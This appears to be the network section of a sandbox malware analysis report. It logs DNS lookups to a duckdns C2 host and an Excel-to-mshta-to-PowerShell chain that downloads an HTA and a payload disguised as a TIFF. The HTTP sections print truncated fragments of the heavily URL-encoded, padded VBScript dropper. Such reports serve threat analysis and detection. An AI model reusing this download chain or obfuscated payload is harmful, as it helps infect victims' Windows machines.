                                                      Aug 28, 2024 06:57:04.168436050 CEST4917780192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:57:04.168459892 CEST4917780192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:57:04.168540955 CEST8049177192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:57:04.168551922 CEST8049177192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:57:04.168560982 CEST8049177192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:57:04.168572903 CEST8049177192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:57:04.168582916 CEST8049177192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:57:04.168586969 CEST4917780192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:57:04.168593884 CEST8049177192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:57:04.168605089 CEST8049177192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:57:04.168606997 CEST4917780192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:57:04.168623924 CEST8049177192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:57:04.168629885 CEST4917780192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:57:04.168665886 CEST4917780192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:57:04.168781996 CEST8049177192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:57:04.304491043 CEST4917780192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:57:34.044358015 CEST1464549170192.3.64.135192.168.2.22
                                                      Aug 28, 2024 06:57:34.045882940 CEST4917014645192.168.2.22192.3.64.135
                                                      Aug 28, 2024 06:57:34.050825119 CEST1464549170192.3.64.135192.168.2.22
                                                      Aug 28, 2024 06:58:01.415756941 CEST4917280192.168.2.22178.237.33.50
                                                      Aug 28, 2024 06:58:01.735013008 CEST4917280192.168.2.22178.237.33.50
                                                      Aug 28, 2024 06:58:02.327795029 CEST4917280192.168.2.22178.237.33.50
                                                      Aug 28, 2024 06:58:03.528995991 CEST4917280192.168.2.22178.237.33.50
                                                      Aug 28, 2024 06:58:04.074624062 CEST1464549170192.3.64.135192.168.2.22
                                                      Aug 28, 2024 06:58:04.075916052 CEST4917014645192.168.2.22192.3.64.135
                                                      Aug 28, 2024 06:58:04.080674887 CEST1464549170192.3.64.135192.168.2.22
                                                      Aug 28, 2024 06:58:05.962579012 CEST4917280192.168.2.22178.237.33.50
                                                      Aug 28, 2024 06:58:10.860896111 CEST4917280192.168.2.22178.237.33.50
                                                      Aug 28, 2024 06:58:20.532984018 CEST4917280192.168.2.22178.237.33.50
                                                      Aug 28, 2024 06:58:34.077111006 CEST1464549170192.3.64.135192.168.2.22
                                                      Aug 28, 2024 06:58:34.080347061 CEST4917014645192.168.2.22192.3.64.135
                                                      Aug 28, 2024 06:58:34.085201979 CEST1464549170192.3.64.135192.168.2.22
                                                      Aug 28, 2024 06:59:04.109985113 CEST1464549170192.3.64.135192.168.2.22
                                                      Aug 28, 2024 06:59:04.129148960 CEST4917014645192.168.2.22192.3.64.135
                                                      Aug 28, 2024 06:59:04.134068012 CEST1464549170192.3.64.135192.168.2.22
                                                      Aug 28, 2024 06:59:34.133146048 CEST1464549170192.3.64.135192.168.2.22
                                                      Aug 28, 2024 06:59:34.135364056 CEST4917014645192.168.2.22192.3.64.135
                                                      Aug 28, 2024 06:59:34.140167952 CEST1464549170192.3.64.135192.168.2.22

                                                      UDP Packets

                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Aug 28, 2024 06:56:26.861217976 CEST5456253192.168.2.228.8.8.8
                                                      Aug 28, 2024 06:56:26.868262053 CEST53545628.8.8.8192.168.2.22
                                                      Aug 28, 2024 06:56:28.906941891 CEST5291753192.168.2.228.8.8.8
                                                      Aug 28, 2024 06:56:28.913908958 CEST53529178.8.8.8192.168.2.22
                                                      Aug 28, 2024 06:56:41.334906101 CEST6275153192.168.2.228.8.8.8
                                                      Aug 28, 2024 06:56:41.344485044 CEST53627518.8.8.8192.168.2.22
                                                      Aug 28, 2024 06:56:45.580848932 CEST5789353192.168.2.228.8.8.8
                                                      Aug 28, 2024 06:56:45.679141045 CEST53578938.8.8.8192.168.2.22
                                                      Aug 28, 2024 06:56:47.216500044 CEST5482153192.168.2.228.8.8.8
                                                      Aug 28, 2024 06:56:47.225435972 CEST53548218.8.8.8192.168.2.22
                                                      Aug 28, 2024 06:56:48.870204926 CEST5471953192.168.2.228.8.8.8
                                                      Aug 28, 2024 06:56:48.880779028 CEST53547198.8.8.8192.168.2.22
                                                      Aug 28, 2024 06:57:00.551064968 CEST4988153192.168.2.228.8.8.8
                                                      Aug 28, 2024 06:57:00.562598944 CEST53498818.8.8.8192.168.2.22

                                                      DNS Queries

                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                      Aug 28, 2024 06:56:26.861217976 CEST192.168.2.228.8.8.80xa29fStandard query (0)zhort.deA (IP address)IN (0x0001)false
                                                      Aug 28, 2024 06:56:28.906941891 CEST192.168.2.228.8.8.80x26ddStandard query (0)zhort.deA (IP address)IN (0x0001)false
                                                      Aug 28, 2024 06:56:41.334906101 CEST192.168.2.228.8.8.80xbf29Standard query (0)ia803104.us.archive.orgA (IP address)IN (0x0001)false
                                                      Aug 28, 2024 06:56:45.580848932 CEST192.168.2.228.8.8.80xa4a2Standard query (0)cloudsave.duckdns.orgA (IP address)IN (0x0001)false
                                                      Aug 28, 2024 06:56:47.216500044 CEST192.168.2.228.8.8.80x68d7Standard query (0)geoplugin.netA (IP address)IN (0x0001)false
                                                      Aug 28, 2024 06:56:48.870204926 CEST192.168.2.228.8.8.80xd3d3Standard query (0)zhort.deA (IP address)IN (0x0001)false
                                                      Aug 28, 2024 06:57:00.551064968 CEST192.168.2.228.8.8.80x13a5Standard query (0)ia803104.us.archive.orgA (IP address)IN (0x0001)false

                                                      DNS Answers

                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                      Aug 28, 2024 06:56:26.868262053 CEST8.8.8.8192.168.2.220xa29fNo error (0)zhort.de88.99.66.38A (IP address)IN (0x0001)false
                                                      Aug 28, 2024 06:56:28.913908958 CEST8.8.8.8192.168.2.220x26ddNo error (0)zhort.de88.99.66.38A (IP address)IN (0x0001)false
                                                      Aug 28, 2024 06:56:41.344485044 CEST8.8.8.8192.168.2.220xbf29No error (0)ia803104.us.archive.org207.241.232.154A (IP address)IN (0x0001)false
                                                      Aug 28, 2024 06:56:45.679141045 CEST8.8.8.8192.168.2.220xa4a2No error (0)cloudsave.duckdns.org192.3.64.135A (IP address)IN (0x0001)false
                                                      Aug 28, 2024 06:56:47.225435972 CEST8.8.8.8192.168.2.220x68d7No error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false
                                                      Aug 28, 2024 06:56:48.880779028 CEST8.8.8.8192.168.2.220xd3d3No error (0)zhort.de88.99.66.38A (IP address)IN (0x0001)false
                                                      Aug 28, 2024 06:57:00.562598944 CEST8.8.8.8192.168.2.220x13a5No error (0)ia803104.us.archive.org207.241.232.154A (IP address)IN (0x0001)false

                                                      HTTP Request Dependency Graph

                                                      • zhort.de
                                                      • ia803104.us.archive.org
                                                      • 192.3.193.155
                                                      • geoplugin.net

                                                      HTTP Packets

                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      0192.168.2.2249164192.3.193.155803528C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                      TimestampBytes transferredDirectionData
                                                      Aug 28, 2024 06:56:27.874830961 CEST357OUTGET /xampp/boz/bz/IEnetworkroundthings.hta HTTP/1.1
                                                      Accept: */*
                                                      UA-CPU: AMD64
                                                      Accept-Encoding: gzip, deflate
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                      Host: 192.3.193.155
                                                      Connection: Keep-Alive
                                                      Aug 28, 2024 06:56:28.368331909 CEST1236INHTTP/1.1 200 OK
                                                      Date: Wed, 28 Aug 2024 04:56:28 GMT
                                                      Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28
                                                      Last-Modified: Wed, 28 Aug 2024 01:17:45 GMT
                                                      ETag: "1ccb3-620b4202337ba"
                                                      Accept-Ranges: bytes
                                                      Content-Length: 117939
                                                      Keep-Alive: timeout=5, max=100
                                                      Connection: Keep-Alive
                                                      Content-Type: application/hta
                                                      Data Raw: 3c 73 63 72 69 70 74 3e 0d 0a 3c 21 2d 2d 0d 0a 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 75 6e 65 73 63 61 70 65 28 22 25 33 43 73 63 72 69 70 74 25 33 45 25 30 41 25 33 43 25 32 31 2d 2d 25 30 41 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 25 32 38 75 6e 65 73 63 61 70 65 25 32 38 25 32 32 25 32 35 33 43 73 63 72 69 70 74 25 32 35 32 30 6c 61 6e 67 75 61 67 65 25 32 35 33 44 4a 61 76 61 53 63 72 69 70 74 25 32 35 33 45 6d 25 32 35 33 44 25 32 35 32 37 25 32 35 32 35 33 43 25 32 35 32 35 32 31 44 4f 43 54 59 50 45 25 32 35 32 35 32 30 68 74 6d 6c 25 32 35 32 35 33 45 25 32 35 32 35 30 41 25 32 35 32 35 33 43 6d 65 74 61 25 32 35 32 35 32 30 68 74 74 70 2d 65 71 75 69 76 25 32 35 32 35 33 44 25 32 35 32 35 32 32 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 25 32 35 32 35 32 32 25 32 35 32 35 32 30 63 6f 6e 74 65 6e 74 25 32 35 32 35 33 44 25 32 35 32 35 32 32 49 45 25 32 35 32 35 33 44 45 6d 75 6c 61 74 65 49 45 38 25 32 35 32 35 32 32 25 32 35 32 35 32 30 25 32 35 32 35 33 45 25 32 35 32 35 30 41 [TRUNCATED]
                                                      Data Ascii: <script>...document.write(unescape("%3Cscript%3E%0A%3C%21--%0Adocument.write%28unescape%28%22%253Cscript%2520language%253DJavaScript%253Em%253D%2527%25253C%252521DOCTYPE%252520html%25253E%25250A%25253Cmeta%252520http-equiv%25253D%252522X-UA-Compatible%252522%252520content%25253D%252522IE%25253DEmulateIE8%252522%252520%25253E%25250A%25253Chtml%25253E%25250A%25253Cbody%25253E%25250A%25253CSCript%252520type%25253D%252522TExT/VBSCrIpt%252522%25253E%25250Adim%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252
                                                      Aug 28, 2024 06:56:28.368351936 CEST1236INData Raw: 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32
                                                      Data Ascii: 520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%2
                                                      Aug 28, 2024 06:56:28.368361950 CEST1236INData Raw: 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32
                                                      Data Ascii: 252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%25252
                                                      Aug 28, 2024 06:56:28.368374109 CEST1236INData Raw: 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32
                                                      Data Ascii: 520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%2
                                                      Aug 28, 2024 06:56:28.368386030 CEST1236INData Raw: 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32
                                                      Data Ascii: 252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%25252
                                                      Aug 28, 2024 06:56:28.368396044 CEST1236INData Raw: 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35
                                                      Data Ascii: 20%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%25
                                                      Aug 28, 2024 06:56:28.368407965 CEST1236INData Raw: 48 6b 4c 53 4e 50 75 46 79 61 56 56 68 75 4f 73 56 64 64 4f 63 50 51 67 77 77 48 47 74 4d 49 57 41 6d 47 56 6c 78 70 71 62 71 66 55 76 58 63 50 52 44 4f 64 59 4b 64 79 6d 46 74 49 45 63 50 75 41 69 6b 6c 6c 4c 44 6a 72 45 4a 62 25 32 35 32 35 32
                                                      Data Ascii: HkLSNPuFyaVVhuOsVddOcPQgwwHGtMIWAmGVlxpqbqfUvXcPRDOdYKdymFtIEcPuAikllLDjrEJb%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%25252
                                                      Aug 28, 2024 06:56:28.368474007 CEST1236INData Raw: 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35
                                                      Data Ascii: 20%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%25
                                                      Aug 28, 2024 06:56:28.368493080 CEST1236INData Raw: 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30
                                                      Data Ascii: 52520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520
                                                      Aug 28, 2024 06:56:28.368504047 CEST556INData Raw: 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32
                                                      Data Ascii: 0%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252
                                                      Aug 28, 2024 06:56:28.373351097 CEST1236INData Raw: 35 32 35 32 30 73 45 74 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32
                                                      Data Ascii: 52520sEt%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      1192.168.2.2249166192.3.193.155803776C:\Windows\System32\mshta.exe
                                                      TimestampBytes transferredDirectionData
                                                      Aug 28, 2024 06:56:29.945830107 CEST434OUTGET /xampp/boz/bz/IEnetworkroundthings.hta HTTP/1.1
                                                      Accept: */*
                                                      Accept-Language: en-US
                                                      UA-CPU: AMD64
                                                      Accept-Encoding: gzip, deflate
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                      Range: bytes=8895-
                                                      Connection: Keep-Alive
                                                      Host: 192.3.193.155
                                                      If-Range: "1ccb3-620b4202337ba"
                                                      Aug 28, 2024 06:56:30.438086033 CEST1236INHTTP/1.1 206 Partial Content
                                                      Date: Wed, 28 Aug 2024 04:56:30 GMT
                                                      Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28
                                                      Last-Modified: Wed, 28 Aug 2024 01:17:45 GMT
                                                      ETag: "1ccb3-620b4202337ba"
                                                      Accept-Ranges: bytes
                                                      Content-Length: 109044
                                                      Content-Range: bytes 8895-117938/117939
                                                      Keep-Alive: timeout=5, max=100
                                                      Connection: Keep-Alive
                                                      Content-Type: application/hta
                                                      Data Raw: 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 [TRUNCATED]
                                                      Data Ascii: 52520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%25253A%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%2
                                                      Aug 28, 2024 06:56:30.438103914 CEST1236INData Raw: 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30
                                                      Data Ascii: 52520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520
                                                      Aug 28, 2024 06:56:30.438113928 CEST1236INData Raw: 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32
                                                      Data Ascii: 0%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252
                                                      Aug 28, 2024 06:56:30.438126087 CEST672INData Raw: 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35
                                                      Data Ascii: %252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%2525
                                                      Aug 28, 2024 06:56:30.438137054 CEST1236INData Raw: 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35
                                                      Data Ascii: %252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%2525
                                                      Aug 28, 2024 06:56:30.438143015 CEST1236INData Raw: 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25
                                                      Data Ascii: 2520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%
                                                      Aug 28, 2024 06:56:30.438199043 CEST1236INData Raw: 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35
                                                      Data Ascii: %252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%2525
                                                      Aug 28, 2024 06:56:30.438210964 CEST1236INData Raw: 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32
                                                      Data Ascii: 520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%2
                                                      Aug 28, 2024 06:56:30.438220978 CEST1236INData Raw: 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 43 52 45 61 54 65 4f 42 4a 65 63 74 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25
                                                      Data Ascii: 252520%252520%252520CREaTeOBJect%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%
                                                      Aug 28, 2024 06:56:30.438234091 CEST1236INData Raw: 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35
                                                      Data Ascii: %252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%2525
                                                      Aug 28, 2024 06:56:30.443317890 CEST1236INData Raw: 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32
                                                      Data Ascii: 520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%2


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      2192.168.2.2249167192.3.193.155803912C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      TimestampBytes transferredDirectionData
                                                      Aug 28, 2024 06:56:35.803028107 CEST367OUTGET /xampp/boz/wecreatedbuttersmoothbutterthings.tIF HTTP/1.1
                                                      Accept: */*
                                                      UA-CPU: AMD64
                                                      Accept-Encoding: gzip, deflate
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                      Host: 192.3.193.155
                                                      Connection: Keep-Alive
                                                      Aug 28, 2024 06:56:36.286940098 CEST1236INHTTP/1.1 200 OK
                                                      Date: Wed, 28 Aug 2024 04:56:36 GMT
                                                      Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28
                                                      Last-Modified: Wed, 28 Aug 2024 01:14:37 GMT
                                                      ETag: "2c73a-620b414e89035"
                                                      Accept-Ranges: bytes
                                                      Content-Length: 182074
                                                      Keep-Alive: timeout=5, max=100
                                                      Connection: Keep-Alive
                                                      Content-Type: image/tiff
